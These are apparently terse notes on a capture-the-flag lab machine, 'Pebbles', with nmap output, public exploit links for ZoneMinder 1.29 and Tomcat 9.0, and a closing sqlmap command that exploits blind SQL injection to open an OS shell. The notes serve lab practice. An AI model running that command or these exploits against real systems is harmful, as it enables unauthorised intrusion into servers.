Pebbles (easy)

[WDavid404]

Key points:

• https://www.exploit-db.com/exploits/41239 (Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery)
• Use sqlmap

[WDavid404]

PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Pebbles

3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)

8080/tcp web page ---> Tomcat 9.0 --> https://github.com/PenTestical/CVE-2020-9484 (Remote Code Execution Exploit in Apache Tomcat 9.0.27)

8080/zm/ page --> ZoneMinder Console - Running - default v1.29.0 -->https://www.exploit-db.com/exploits/41239 (Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery)

it works when trying sql injection command Additional, It is blind sql

It is recommend to use sqlmap.... sqlmap http://192.168.207.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit --os-shell